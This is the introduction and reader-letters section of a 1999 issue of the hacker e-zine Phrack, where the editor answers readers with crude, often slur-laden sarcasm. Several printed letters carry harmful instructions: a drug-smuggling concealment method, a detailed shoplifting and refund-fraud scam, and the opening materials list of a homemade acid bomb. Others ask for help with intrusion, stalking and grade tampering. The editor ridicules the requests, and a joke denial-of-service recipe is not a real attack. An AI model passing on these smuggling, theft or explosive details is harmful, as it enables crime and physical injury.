-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 01 of 19 ]
-------------------------[ P H R A C K 5 5 I N D E X ]
--------[ Return of the Genius Loci ]
Lies! Lies! Lies! Lord of the Lies. That's me. I promised a timely Phrack
and look what happened. A 9 month lapse. Whew. Wow. Ri-friggin-diculous.
Holy crap I suck. To all you patient/ambivalent readers out there -- terribly
sorry about that. To all you whiners/complainers in the end, it just goes to
show you: Fuck Off. For all you people that contributed nothing except
negative commentary over the past few months, I'd like to introduce you to
the real world. The real world is where free computer security technical
journals don't pay bills or get you chicks. Or get you chicks that pay bills
for that matter.
THAT'S THE WORLD I LIVE IN.
TRUST ME WHEN I TELL YOU I WOULD CHANGE IT IF I COULD.
But I can't. So I do what I do to make ends meet. Sometimes it gets in the
way.
Hrm. You think 9 months is bad? Let's take a look at the publishing history
of Phrack Magazine, since its inception, way back in November of 1985. I
present to you the publishing schedule of Phrack Magazine from 1985 - 1999.
______________________________________________________________________________
Jan | 02? 10 23 52
Feb | 03 11 24
Mar | 04 12 25 37 42 45
Apr | 05 13 17 26 38 47 50
May | 31
Jun | 06 18 27 39
Jul | 14 19 43 53
Aug | 15 40
Sep | 07 33 46 48 51 55
Oct | 08? 16? 20 28 34
Nov | 01 21 29 32 35 44 49
Dec | 09? 22 30 36 41 54
------------------------------------------------------------------------------
| 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99
------------------------------------------------------------------------------
Ok.. Things look pretty good for the first year... 8 issues in one year.
Not bad fellas, not bad... Uh-oh! A 6 month gap between 16 and 17! What's
up? Apparently, the editors at that time (Phrack's founding fathers TK and
KL) had gone off to college and left the Magazine in the hands of Elric of
Imrryr. Mmmhmm. A FLIMSY EXCUSE! The next large gap we see is between 32
and 33. Apparently there was some crap going on having to do with the Secret
Service shutting Phrack down and something about issues 31 and 32 not being
sanctioned or something... Blah blah blah. Ok great. This was like 8 years
ago. Who the hell carez. At any rate, things appear to be pretty much
business as usual after that. Then something amazing -- Chris Goggans takes
over. First a 3 month gap. Then a 4 month lapse. Then back down to 3. Then
up to 5. Then 6. Then the unthinkable happens. A 16 month coma.
THEN YOURS TRULY TAKEZ OVER AT THE HELM AND BREATHEZ SOME LIFE INTO THIS DEAD
BODY!
BOOM BAP! Check out THESE NUMBERS: 2 months, 4 months, 4 months, 3 months, 5
months!... Um. 9 months. Ok. Well. Oops. My point is... Well. 9 months
isn't as bad as Goggans. So there you have it! Basically, when all's said
and done, at the end of the day, I am not as bad as Goggans.
In any event, this issue has a surplus of good articles. Read them.
In other news, we heard a nasty rumor. Starting September 11th, 1999 Network
Solutions "the dot com people" (*how adorable*) are going to start their
policy of requiring prepayment at the time of domain-name registration. What
does this mean to you? NO MORE FREE DOMAINS FOR THREE MONTHS! No more `try
before you buy`, no more `cooling-off` period. If you fuck up and register
`masster-ninja.com` brother, you're stuck with it! So check your spelling.
Oh yah. I have something very un-P.C. to say, something very controversial...
Something you're not going to like.. But I have to say it:
GOD BLESS CANADA!
WAIT. HOLD ON. Before you rm this issue, give me a chance to explain why
Canada rules. If it wasn't for Canada, there would be no t00nces. There.
That's the sole reason why Canada rules. If it wasn't for t00nces, there
would have probably been a murder at the last Phrack sponsored BBQ (or at
the very least, some serious battery). On 3 separate occasions he quelled
major rucki. The largest of which would have resulted in drunken dirtbag
being pummeled into chowder. He would have been a little smudgie on my
front lawn. As much as I am usually down for a drunken dirtbag pummeling,
we can't have that at the house. t00nces is an all-around great guy. He's
definitely my favorite Canadian-American citizen.
Besides. I lost our Country's pride when I played him in our monthly America
vs. Canada pool game. My penance was to write a treatise on how much Canada
rules. Well. The best I can do is how much t00nces rules.
Phrack Magazine mourns the recent passing of W. Richard Stevens. For a special
tribute, please see P55-04.
Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Phrack World News --------------[ disorder
-------- Elite --------------------> daveg
-- Official Phrack King Crab ------[ loadammo
-- Official Phrack Girlfriend ----[ A.R.A.
-- B.A. Baracus Phrack Fracas -----[ PETE F. vs. KRIS C.
-- Official Phrack Long Gun -------[ Bennelli M1 Super 90 (tactical)
-- WHOA HO HO ---------------------[ aaronb
-- Netris Championz ---------------[ prym & ReDragon
-- Ketel One Connoisseur ----------[ vision
-- Official Phrack Bouncer --------[ t00nces
-- Congratulations to -------------[ W.O.F. and N.R.A.
-- Special Thankz to --------------[ kweiheri, kamee
-- Shout Outs and Thank Yous ------[ h4g1z, felix, WAYNE, rfp, nocarrier, dug
-----------------------------------| song, incr, dreck, nicnoc, e5, sw_r,
-----------------------------------| greg hoglund and dark spyrit, sangfroid,
-----------------------------------| dnm
- You're not in the club if -------[ you don't recognize half of these people
Phrack Magazine V. 9, #55, September 09, 1999. ISSN 1068-1035
Contents Copyright (c) 1999 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editor in chief. Phrack Magazine is made available to the public, as often as
possible, free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------
Editor in Chief: route@phrack.com
Submissions: route@phrack.com
Associate Editor: alhambra@phrack.com
Commentary: loopback@phrack.com
Phrack World News: disorder@phrack.com
Submissions to the above email address may be encrypted with the following key:
As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out
plaintext. You certainly can subscribe in plaintext.
phrack:~# head -20 /usr/include/std-disclaimer.h
/*
* All information in Phrack Magazine is, to the best of the ability of the
* editors and contributors, truthful and accurate. When possible, all facts
* are checked, all code is compiled. However, we are not omniscient (hell,
* we don't even get paid). It is entirely possible something contained
* within this publication is incorrect in some way. If this is the case,
* please drop us some email so that we can correct it in a future issue.
*
*
* Also, keep in mind that Phrack Magazine accepts no responsibility for the
* entirely stupid (or illegal) things people may do with the information
* contained herein. Phrack is a compendium of knowledge, wisdom, wit, and
* sass. We neither advocate, condone nor participate in any sort of illicit
* behavior. But we will sit back and watch.
*
*
* Lastly, it bears mentioning that the opinions that may be expressed in the
* articles of Phrack Magazine are intellectual property of their authors.
* These opinions do not necessarily represent those of the Phrack Staff.
*/
-------------------------[ T A B L E O F C O N T E N T S ]
01 Introduction                             Phrack Staff         014 K
02 Phrack Loopback                          Phrack Staff         051 K
03 Phrack Line Noise                        various              037 K
04 Phrack Tribute to W. Richard Stevens     Phrack Staff         004 K
05 A Real NT Rootkit                        Greg Hoglund         066 K
06 The Libnet Reference Manual              route                181 K
07 PERL CGI Problems                        rfp                  017 K
08 Frame Pointer Overwriting                klog                 020 K
09 Distributed Information Gathering        hybrid               010 K
10 Building Bastion Routers with IOS        Brett / Variable K   037 K
11 Stego Hasho                              Conehead             037 K
12 Building Into The Linux Network Layer    kossak / lifeline    044 K
13 The Black Book of AFS                    nicnoc               011 K
14 A Global Positioning System Primer       e5                   015 K
15 Win32 Buffer Overflows...                dark spyrit          078 K
16 Distributed Metastasis...                Andrew J. Stewart    031 K
17 H.323 Firewall Security Issues           Dan Moniz            015 K
18 Phrack World News                        disorder             021 K
19 Phrack Magazine Extraction Utility       Phrack Staff         021 K
                                                                 711 K
-----------------------------------------------------------------------------
"...Yeah, yeah, Phrack is still active you may say. Well let me tell you
something. Phrack is not what it used to be. The people who make Phrack
are not Knight Lightning and Taran King, from those old BBS days. They
are people like you and me, not very different, that took on themselves
a job that it is obvious that is too big for them. Too big? hell, HUGE.
Phrack is not what it used to be anymore. Just try reading, let's say,
Phrack 24, and Phrack 54."
- bjx of "PURSUiT" trying to justify his `old-school` ezine. bjx wrote
a riveting piece on "Installing Slackware" article. Fear and respect
the lower case "i".
"We might get a PURSUiT meeting at DefCon 9 which will take place in year
2001. Meenwhile, it's an idea, because I belive 40% of the PURSUiT crew
are going to DefCon 9, so we will try to convince the rest of the crew
to join us."
- bjx of "PURSUiT" on his distant defcon plans. Hey, buddy, if you
save a dollar a day for the next two years, you should have enough!
"I assume she did a jiggly +liar search on altavista..."
- gheap, when asked to venture a guess as how a certain person was found
on a random corporate webpage.
"Hrm.. There just arent enough web sites that use the word `jiggly`."
- gheap, after putting some thought into it.
-----------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 02 of 19 ]
-------------------------[ P H R A C K 5 5 L O O P B A C K ]
--------[ Phrack Staff ]
Phrack Loopback is your chance to write to the Phrack staff with your
comments, questions, or whatever. The responses are generally written by
the editor, except where noted. The actual letters are perhaps edited
for format, but generally not for grammar and/or spelling. We try not to
correct the vernacular, as it often adds a colorful perspective to the
letter in question.
Thanks to kamee and loadammo for their help.
0x01>-------------------------------------------------------------------------
route, you suck--all you phrack people do.
[ Extra double dumb-ass on us! ]
you would think 8 months is enough time to put out phrack 55, but NO.
[ You *would* think so, wouldn't you? I *knew* I should have quit my
job. Well, I'm certain you spent the downtime working on your
world-renown top-notch freely distributed highly-technical ezine
right? How many issues did you pump out? 2? 3? Where can we get
it? ]
You say it will be out on August 31, now it is September 9?
[ 09.09.99 is so much more of an elite date than 08.31.99. In fact,
09.09.99 is the most elite date of our lifetime. ]
Faggots.
[ Is uh.. Is that a proposition? Are you looking for some action or
something? ]
- grez@vulgar.net
[ Thanks man! Now everyone knows where to send the love! ]
0x02>-------------------------------------------------------------------------
I'm a San Francisco criminal defense attorney, and, because I believe curiosity
should not be a crime and information wants to be free, I hereby volunteer my
legal services to Phrack readers. For a free legal consultation, contact me,
Omar Figueroa, Esq. at omar@alumni.stanford.org or (415) 986-5591.
http://www.2xtreme.net/omar/
[ Very cool. I'm sure many readers if nothing else will at least have
questions regarding the law and how it impacts their rarified
profession... Keep in mind Omar that many 'hacker'-types requiring
legal services are prone to idiocy and therefore not likely to have
money. Hope you're up for some good ole-fashioned pro bono work! ]
0x03>-------------------------------------------------------------------------
Hey, glad to see your site back up, I was beginning to wonder what
happened...
[ Alhambra tripped over the power cord. We didn't notice for a few
months. Our bad. ]
While you were down, an item came up on my Zen calendar that I thought
you might enjoy:
[ The `Zen Calander`? Does it have pictures of Shakyamuni Buddha in
a bikini? ]
"The shell must be cracked apart if what is in it is to come out, for
if you want the kernel you must break the shell. And therefore, if
you want to discover nature's nakedness, you must destroy its symbols,
and the farther you get in, the nearer you come to its essence. When
you come to the One that gathers all things up into itself, there your
soul must stay." -Meister Eckhart
hmmm....
[ Man that's just great. I'm going to go dunk my head in a pot of
boiling water now. Be right back... ]
Anyway, Phrack is a *great* mag, keep up the good work.
[ Agreed. Thanks. ]
- ped xing
0x04>-------------------------------------------------------------------------
I don't have a computer yet because I don't know to much about it??
[ Are you asking me or telling me? And if you're sans computer, how
the hell are you writing me this email? OMG! Are we communicating
through your mind?!?@! Are you using the /shining/? Ok. You can
use yer shining to call me when you need my help... But don't be
reading my mind between 4 and 5. That's _route's_ time. STAY OUT! ]
but the basic things but i been trying to get to some underground site
which willput me in the write direction,into hacking...
[ I'm suggesting you spend that computer money on some at-home ESL
classes. ]
in your site is off the hook,it has infor that i can use thanx
[ Yes, when I'm watching a movie or I don't want to be bothered, I
take www.phrack.com off the hook. ]
I know i may not be answered back but can you send me some site that may
help me into starting my long journey of hacking
[ http://owl.english.purdue.edu/esl/ESL-student.html ]
...thank you...in my email is weeddreams@yahoo.com
0x05>-------------------------------------------------------------------------
Hi,
I am a wannabe hacker.
[ I'm a wannabe rockstar. Wanna hang out? ]
I have access to all the equipment. modems, routers, even my own pbx.
[ Well that's a start! I suggest the next step should be actually
getting a computer of some sort so all that networking hardware
doesn't go to waste! ]
Where will i find material describing typical methods to test the systems
for security. (TCP- SYN attack, ip-spoofing)
[ Phrack Magazine, issues 48 - 53. ]
I am especially interested in DOS attacks.
[ And why not? You seem like a highly intelligent guy. I'll give you
a heads up on a particularly nasty one (as yet unreleased) certain to
take down even the most resilient hosts: Send the following 4 packets to
the target host:
1 - TCP SYN|RST with ISN == (2^32 - 0x12A3) to a LISTENing port
2 - TCP ACK with SEQ_ACK == (0x12A4) to same port
3 - ICMP_PORT_UNREACH (IP header inside is irrelevant)
4 - UDP to same port
Next, quickly douse your computer in lighter fluid, and set it on fire.
Wait a few minutes, then try and reach that host. You'll find that you
can't. Thank me later. ]
Any pointers will be appreciated.
[ void *you = NULL; ]
- LordKrishna
0x06>-------------------------------------------------------------------------
I know quite a bit about computers and started learning to program (or trying
at least - I had trouble figuring out what the hell a variable was) when
I was like seven.
[ Yah, variables are tricky -- don't use them. Stick to symbolic
constants. ]
Now, I'm kinda' interested in hacking and phreaking, but I have seen many
files out there from the 80's and early 90's that probably have little or
no significance know.
[ As useless as 1950's porn. ]
I have seen plans for blue boxes and red boxes everywhere, but I am assuming
that this does not work anymore, since as stupid as phone companies are often
depicted, I'm sure they have managed to fix these problems by now.
[ I have seen plans for world domination everywhere, and not even those
work. Personally, I want my money back. ]
However, I'm sure that there's still lots to do as far as phreaking goes,
and definately hacking, because I hear about that all the time.
[ I don't think anyone's ever hacked a tic-tac before. You could
start there! ]
Anyway, I was wondering if you or someone else you know would care to write a
file describing what works and doesn't in the modern world. I love to read
Phrack, but a lot of the older issues are either over my head
[ Me too! I especially have problems with P25-05, P27-08, P28-06.
I don't understand the need for wild turkeys when hacking. Maybe
it was a fad 10 years ago. ]
or seem more or less irrelevant. As you, and most other hackers/phreaks,
probably grew up when computers were still in earlier stages,
[ Yep. My first computer was a rock and some dirt. ]
you probably know a lot more about how they work than newer programmers.
[ Oh hell yes! Think of a computer as a tiny, super complex street
hooker. The more you put in.. Wait. No. That's not a good
analogy... Um... A computer is like a piece of paper. Er. No.
Um. I really have no idea how they work. ]
I can tell this just by reading this ASM book I got. I had no idea what
kinda' stuff happened with the actual hardware and its fun to learn.
[ Hrm. Do you think maybe we could get together one night and
you could read to me? Softly? ]
Basically, I just want a modern beginner's guide so I can go out and get my
feet wet.
[ Well jump right in! The idiot pool has plenty of space and I'm
told the new spa has a diving board. ]
Most of the literature I have seen on phreaking/basic hacking is really old,
so if you know of anything modern I could look at, or would like to write
something yourself, I'd appreciate this quite a bit.
[ Have you tried searching for "hack +modern" on altavista? ]
Thanks a lot, man.
- Cyber Guy
[ Great handle man! ]
0x07>-------------------------------------------------------------------------
hia chief
[ Heya dorko. ]
my nick is spider
[ How creative. Chalk has more flavor. ]
i'm a future hacker to be for now i need info about a free server
[ That's nice. I need info on how to make girls like me. I think we
can probably help each other. ]
- spider.
[ Great handle man! ]
0x08>-------------------------------------------------------------------------
phreaks, i have recently discovered your site.
[ Congratulations. I've recently discovered how to love. ]
i must say i was impressed by the contents.
[ Well thank you very much! Sounds good so far... ]
i live in japan, the drug trade here is good but very expensive.
[ Hrm. Have you tried switching to generics? I know acetylsalicylic
acid is sold in many generic forms. ]
so i import cid and x from the states...one problem....they have a police
[ Japan has to import Caller ID? ]
dog to sniff every item before it is mailed. i have found a way to by pass
this. first get a new unopened peanut butter jar....take the seal off very
[ Hrm. Skippy or Jiff? Glass Jar or Plastic? Crunchy or smooth?
And how big? What about peanut butter cookies? Will they work?
Please people... Before you send in some half-cocked scheme, take
2 minutes and do some research. ]
carefully dont rip it....scoop out a good amout of pb from the center..
carfully place "the stuff" inside a plastic bag and place into the jar...
recover with the pb.....
[ What do I do with the extra peanut butter? Can I use it to make a
samich? Or should I hold on to it for safe keeping? ]
place the seal back ontop and iron on....this gives back its unopened
look...next place lid back on top and your ready to be inspected.
- Sloshkin
[ Well nice going Sloshkin! You've managed to ruined this completely
lame drug trafficking technique for moronic drug smugglers! All FBI
agents please contact your DEA pals! Tell them to be on the lookout
for peanut butter. ]
0x09>-------------------------------------------------------------------------
Due to the slow net,I have diffculty to download your excellent articles.
[ Yep. It's all the porn trafficking going on. ]
Can you do me the favor to send it to me by email?
[ Not a problem, expect them in 6 - 8 weeks. ]
I will not do harm to anyone,I swear.
[ Better not. Phrack is equipped with explosive dye packs. If you
do something illicit they will explode all over your hands and face
and the authorities will be alerted. ]
0x0a>-------------------------------------------------------------------------
I sing and play guitair in a fairly unique punk band called "The gods
Hate Kansas".
[ Really? That's coincidental because I hate Kansas. ]
Our lyrics and beleifs tend to revolve around corporate and governmental
sabotage.
[ Excellent idea. Let's collapse our economy and destroy the
government. Better yet, let's beat terrorist extremists (like
Osama Bin Ladin) to the punch and blow ourselves up. Do you have
any idea how much they hate Americans? Oh wait, they're just
`Wag The Dog` inventions, right? ]
Right now, we're gearing up to record in June. The new CD will only be
about 5 songs so we decided to make it a "multi-media" CD and include a
couple videos, our website, and some misc. files on lockping, redboxing,
and hacking.
[ Those free AOL CDs sound better. Must miss! ]
I was wondering if you might have anything that you might specificly want
to contribute to this effort.
[ Just my unending sarcasm. Oh, BTW I was being sarcastic. ]
The punk scene is a wonderfull breeding ground of discontent and has a lot
of paralels to hacker culture
[ Hackers are discontent? Hrm. Larry Wall seems pretty happy. And I
don't think he likes punk. ]
and this CD has the potential to reach a lot of people..
[ Like all the 15 year old disgruntled suburban kids in Kansas who think
they `have it rough at home` and `no one understands their shit` so
they get their noses pierced along with lame haircuts and hang out
at seedy hardcore clubs! ]
- Rion
0x0b>-------------------------------------------------------------------------
WUZ ^
[ How preciously retarded! ]
I found my schools dial-up and I want you guys to try and hack it if you can.
ITS: xxx-7035 St. Francis Jr. High. Fuck it up as much as possible please!
[ Dude, somehow I don't think it would right for us to hack into a
`special` education school. I think you should just get back to your
room, back into your restraints, and back on the meds. ]
They have an entire network of macs and ibm's.
[ All hooked up to machines to keep you guys from drooling. ]
0x0c>-------------------------------------------------------------------------
Sup, I am interested in hacking. I do not know much about how to hack and
want to learn more. I want to try and get a password from a certain somebody to
read their mail.
[ Well, genius, TRY ASKING. ]
I opened up an account at wowmail to check it out. I found out that once
you are in your own account that if u view source...it actually shows you
your password!
[ NO WAY@!#! HOLY SHIT THAT'S INCREDIBLE! ]
So...is there a way to write a program where when a user tries to open
their mail...somehow u can view source and send it back to your e-mail
account without the user ever finding out?
[ Jesus, let her go man and mind that restraining order. ]
Or is there another way u could tell me how I could obtain the password
and how to go about it?
[ Spy for love. Pattern yourself after the Stasi Super-Romeo Roland G.
He won the affections of a lovely young woman named Margarete, an
interpreter at NATO's SHAPE (Supreme Headquarters Allied Powers Europe).
She divulged all kinds of secrets regarding Allied military manuvers
and whatnot. ]
Thanx,
Steve
0x0d>-------------------------------------------------------------------------
Just wondering if i can be a part of Phrack.com ?
[ Short answer: No. Long answer: Hell no. ]
Personal Information
~~~~~~~~~~~~~~~~~~~~
Handle: Action Man
Call me: Steve
Past Handle: Virtual Son, Renegade
[ Oooh! Lorenzo Lamas reads Phrack! I am torn between killing myself with
a shovel or with the garbage disposal. ]
Handle Origin: You know when some phat name that pops into your head
when you need a handle....well there you go./ "Action Man"
from the movie "MasterMinds"
[ Master? Man head? Action? "Handle"? That's just too many homo-erotic
masturbation-related words to be a conincidence. Less jerking, more
schoolin' I say. ]
Height: 5'8"
Weight: 175lbs
[ Whoa. A bit heavy aren't we? You know it's never *too* early to NOT
eat bear claws 2 at a time. ]
Eyes: Brown
Hair: Brown
Computers: IBM/Pentium TE(Technology Edge)
When i was in the 5-6th grade i had an interest in computers and how they
worked.
[ Hey great. Let try and find a homeless person that cares. ]
So my first comp was a ibm aptiva.
[ My first comp was a room upgrade in Vegas. ]
Not very fast but enough to get me through the day.
[ Man, it usually takes me 3 or 4 ketel-1/tonics to get through the day. ]
I started to have the interest in hacking/phreaking when i was about in
the 7th so that the computer stuff came easy to me..
[ c:\dos> vol
Volume in drive C is DOS
Volume Serial Number is 12A1-1C20
c:\dos> label
Volume in drive C is DOS
Volume Serial Number is 12A1-1C20
Volume label (11 characters, ENTER for none)? 3L1T3H4CK3R
c:\dos> vol
Volume in drive C is 3L1T3H4CK3R
Volume Serial Number is 12A1-1C20
c:\dos> damn i rool
Bad command or file name
Keep the faith buddy... ]
at this point in time i am still crawling through the maze of hacking..
[ Me too! Well, kinda. I'm at the bottom of a vodka bottle. Same
difference though. ]
reading books...looking through the articles at your site and spending
endless nights on the comp throwing commands at computers i get in to and
dont know what i am in for.
[ c:\dos> root
Bad command or file name
c:\dos> give actionman root
Bad command or file name
c:\dos> password root actionman
Bad command or file name
c:\dos> FUCKFUCKFUCKFUCKFUCKFUCKFUCK
Bad command or file name
c:\dos> whyamisolameohgodpleasesomeonekillme
Bad command or file name
c:\dos> ohgodimafourstarloser
Bad command or file name ]
So far in my boring ass town from where i dwell.
[ Huh? ]
Noone around here does what us Elite personnel do and it bothers me.
[ By `us` I am going to assume you mean anyone but myself and Phrack staff.
Actually, I am going to demand it. ]
It bothers me that i cant hang with someone.
[ Maybe you should try to make some friends Action Man! Your life can't
be all hacking and saving the world and riding around on a Harley! ]
I have to do it the hard way and that way is alone.
[ Get use to it. ]
Hopefully you can recrute me into the world of Phrack.com
[ I think it's time for an intervention. Get yourself a sponsor. ]
Thank you
- Action Man
0x0e>-------------------------------------------------------------------------
I Started my search today for revenge.
[ Did you look under the bed? Whenever I'm trying to find something,
like the T.V. remote, it's usually under the bed. ]
My goal to learn to hack or talk a bored halker into helping me hack my
ex's computer.
[ Check out action man, I hear he's pretty damned good. ]
After reviewing sites that you have made of 'how to hack' I see that what
you do isn't as easy as one might first mistaken.
[ It takes many many many hours to get this good. I'm talking dozens. ]
As far as my goal I now see it wouldn't do any good or accomplish shit. So
thanx for making all this info available to a peon such as myself.
- Z-taj
[ Wow, that was easy. I wish everyone gave up that quickly. ]
0x0f>-------------------------------------------------------------------------
How to make a Drano Bomb
by the Fellow Felon
WARNING!!!!!!: This Article is Intended for Educational Use Only!!
[ WHICH IS IRONIC GIVEN ITS SOURCE! ]
The Unabomber Staff is NOT responsible for any misuse of this information!!
[ Cretin. How do you misuse bomb creation plans? Isn't the intention
to blow something up? ]
Setting these off within city limits is a crime and you Probably will get
caught.
[ Not to mention the idiocy factor. ]
Enough of that.
A Drano Bomb is a simple way to scare the hell out of anyone.
It sounds like a Shotgun Blast.
[ How about a real shotgun? When fired, it sounds more like a shotgun
blast and will scare more people. ]
First however, you must obtain some aluminum foil,
[ Foil, as we all know, can be tricky to track down. I've found that it
usually runs in herds, and on a hot day foil herds tend to gather near
lakes or rivers. One well placed head shot will bring your foil down.
Course, then you gotta clean it... If you can't obtain this foil,
do the next best thing and use your mom's best china. ]
"The Works"-a toilet bowl cleaner, and a 20 ounce Pop bottle. You can
use any toilet bowl cleaner as long as it says somewhere on ther bottle,
"WARNING!!-CONTAINS HYDROCHLORIC ACID!!".
[ Ok. Enough of this crap. Had I left this entire letter in, some
retard would probably blow his dick off and somehow, I'd be liable. ]
0x10>-------------------------------------------------------------------------
hey, u got some real nice info here.
[ Hey man I've got some real nice *everything* here. Take only pictures,
leave only footprints. ]
i used a few of the ideas for revenge and thanks alot for posting it.
[ People like you make people like me want to own guns. Well, _more_
guns... more ammunition anyway... ]
it really sucks that the punk ass govt. wants to take all this shit off the
net.
[ The `punk ass` government rounds people like you up by the truckload
and sticks them in pens to barter with the aliens who frequent our
planet. "Ok, how many do you want this time to NOT enslave our entire
race...?" Just remember to lift at the knees. ]
u know it all stems from fear that the public will finally rise up and take
control.
[ Or that retards like you will try to build a draino bomb and blow off
his dick. I say go for it. ]
anyway, i'd really appreciate it if u come across anything having to do
with phuckin up cars or things that go "kaboom" let me send them my way.
[ PLEASE DON'T BREED. ]
hey, don't send the files here please. i phucked up on the address.
send it master23@collegeclub.com. thanks. the other site is open to a
few other people. it would be best for me if they didn't see it.
[ DON'T BE A PUPPET TO THE MAN! Stand up for yourself! ]
- master23
[ Hey, any relation to master22? He was in my shop class. ]
0x11>-------------------------------------------------------------------------
Hi there !
I read, that you are good informated in hacking stuff, IP's...
[ I know a thing or two about a thing or two. ]
My question is:
I made a bet with a friend, that I'll hack to his computer.
[ A rousing game of cat and mouse! You rogue! ]
But there fore I need his IP.
[ What do you mean my horse is out of gas? ]
I have already tried much things but all did fail, do you
know a procedure to get his IP, he has got while he is online without
NetBus or IRC ? I thought of finding out his DNS, or are there other ways
to reach my aim ?
CU & olease write back !
- Kerstin
[ Kerstin.. That's a cute name. Hrm.. I bet you're cute. In fact,
I think we might have a lot in common... Although.. Hrm.. Now that I
think about it, your spelling and broken English are just queer enough
that you're probably from a country where Kerstin is a guy's name...
In which case, I'm going to have to ask you to leave. ]
0x12>-------------------------------------------------------------------------
WHAT IS THE REASON OF THE HOW TOO INFO ON THIS SITE.
[ OH MY DEAR GOD, IT'S WALKING CLOSER GUYS! ]
DO KNOW WHAT YOU ARE DOING TO OUR CHILDREN.
[ Don't tell anyone, but I heard it was television and radio. And
the rap music. ]
SOMEONE TOLD ME TODAY THAT THIS THURS. IS BLOW UP YOUR SCHOOL NATIONAL HOLIDAY.
[ I'm willing to bet that you're one of those people who gets dismissed in
shame because that "ability to differentiate fantasy from reality" part
of your brain doesn't work quite right. ]
THEY TOLD ME CHECK THIS SITE OUT.
[ Well then! Even though you're an asshole, apparently your friends
aren't. ]
I CAN NOT BELIEVE WHAT I HAVE READ.
[ You're talking about proof reading your email before sending it, right?
Or maybe your broken caps lock key? ]
I AM SICK AT MY STOMACH!!!!!!!!!!!!!!!!!!!!!!!!
[ Let's say this Twinkie represents the normal amount of psychokinetic
energy in the New York area. According to this morning's PKE sample,
the current level in the city would be a Twinkie 35 feet long weighing
approximately six hundred pounds. That's a big Twinkie. ]
WHAT IS THE PURPOSE PLEASE LET ME KNOW. I CANT FIGURE OUT 1 SINGLE
REASON. JUST SICK...........
[ I think you have the wrong number. What number were you trying to
dial? ]
- Tracy.
0x13>-------------------------------------------------------------------------
Please help me.
I tested neptune program in linux kernel 1.2.8.
Target host's OS is Redhat 5.2.
But!! TCP SYN flooding cannot!!
Unreachable host address was 1.0.0.1
Target port was 23
SYN number was 100 ~ 10000000000.
After runningBut!! Connection established!!
Why??
[ Yoda needs to lay off the DOS attacks. ]
0x14>-------------------------------------------------------------------------
i need help hacking into the university of texas' system. any information at
all would be helpful. i need to change my grades before the report cards
come out. thanks.
- christina
i really need some help changing my grades. i go to the university of texas
at austin. if i fail i'll get kicked out of ut and my house. any information
would be very very helpful! thanks.
[ Did you just stutter or was that a double-dose of stupidity? ]
- christina
[ Hrm... Well muh dear, let's talk trade. Why don't you come on over
Friday night, at say, 9ish? I'm sure we'll be able to work something
out... And if you DO end up getting kicked out of your house... You
can always stay at the Phrack Compound.. ]
0x15>-------------------------------------------------------------------------
I am looking for a very simple and easy to follow recipe for the synthesis
of amphetamine.... Anytype..... As long as it is relatively easy to
follow..... Many thanx in advance
[ Ah yes. The lame legacy of Phrack past. Drug creation. Whoo. Dude.
Get a fucking job and move out of your parent's basement before you
blow it up with your ghetto drug lab attempt. ]
- Blonk
0x16>-------------------------------------------------------------------------
Hi,
I was wondering if you would be able to place more articles about
Australia. I am Aussie and would like to learn more about the systems in
place over here.
[ HEY! DO YOU KNOW STEVE IRWIN? I heard once he got eaten by a crocodile
and then, 2 weeks later, he climbed out of the croc's mouth and conked
him on the head and then took him to a wildlife preserve! ]
Thanks for your time,
- King Kon
0x17>-------------------------------------------------------------------------
Editor's of Phrack..
Hey, I was wondering if you would publish a lil information on my BBS..
[ YOU GOT IT LAD! Hey, if I telnet over there, is there a pot of
gold waitin' for me? ]
I've been running my BBS since 10/30/99 without too many users and with only
a few daily callers.. and I'm looking for a way to get my BBS out in the
public, as well as the underground public.. I read Phrack, and know that
a lot of other ppl do as well. So I thought I would ask. Anyhow I need to
run, if you're interested in helping me out, contact me at this Email address
or you can telnet to my BBS.
The Leprechauns Lair BBS
Telnet: tllbbs.dyns.cx port23/ANSI
Dialin: (540) 636-6417 28.8, 1-N-8/ANSI
-Leprechaun Boy/SysOp of TLL BBS
0x18>-------------------------------------------------------------------------
selling cds to their owner:
part 1: record store
by:con-x
1: start by peeling off all stickers (including magnetic strip) from the most
expensive cds you can find.
[ Like `Yanni's Greatest Hits` and `The Carrot Top Collection vol. 11`? ]
note:
1; the more cds the more money-
2; the bigger the record store the better.
[ Note: _more_ money is good because money can be exchanged for goods
and services. Also note: shoes are good because they protect and
cover your feet. ]
2: get a friend to get a bag from the store that you are scamming. have your
friend stand in front of you. pretend to look at cds while slipping the ones in
the bag.
note:
1; beware of all the cameras around you.
2; dont get cought.
[ Note: getting "caught" would be bad because you would go to jail and
not be able to
3: go up to the counter and say- "my mom bought these cds for my birthday
but I can't use them, can I get any refund for them?"
note:
1; accept any half price and/or voucher offers-the less conversation,
the less they will know you the next time.
[ Plus, since you don't know that many words, it helps to keep the
jabber to a minimum. ]
2; this rarely happens but if you get caught, signal your friend to run up
and say "excuse me, don't accept those cds- I just saw some guy trick
him into returning those for him. I think that they were not paid for. if
anything you should bust that guy over there because HE'S the real criminal".
[ Ah! The old switch-aroo! How elegant! The only problem is that
trick only works in cartoons and sketch comedy. Your sources have
betrayed you. ]
4: most times they will only give vouchers. sell the vouchers to someone in
the store who's buying cds. say- "excuse me, are you buying any cds?" not
all the time will they say yes to this text part-
"I have some vouchers that I can't use because I am going on vacation
are you willing to trade money for some of them?"
[ Because you're going on vacation? They're CD's, not milk dumbass.
They're not going to spoil. ]
now you have free money!!!
[ With which to buy more cases of Pabst Blue Ribbon and more blocks
upon which to put your car. ]
con: tricking the store to give you money for their cds.
[ SO THAT'S YOUR GAME! I suspected.. But you kept it so cleverly hidden
up until now. ]
goodside: this con is untraceable!!! they notice that they are losing
money. --they have not been robbed--they still have the same amount of
[ Try telling that to judge. ]
cds--they think that they are gaining money by returning cds--you have got
nothing to lose!!!!!!!
[ In your case, that might be true. Rock bottom IS rock bottom. ]
badside: getting cought-this happens when you peeloff stickers and
slip the cds into the bag-if you don't get cought, then you will be
fine.
[ It's "C-A-U-G-H-T" you cantankerously dimwitted Carolyn Meinel-esque
... uh.. Tool. ]
the earnings: I got $50.00 to $80.00 a day!!!
[ Yes, but this money is income from the insurance settlement (never let
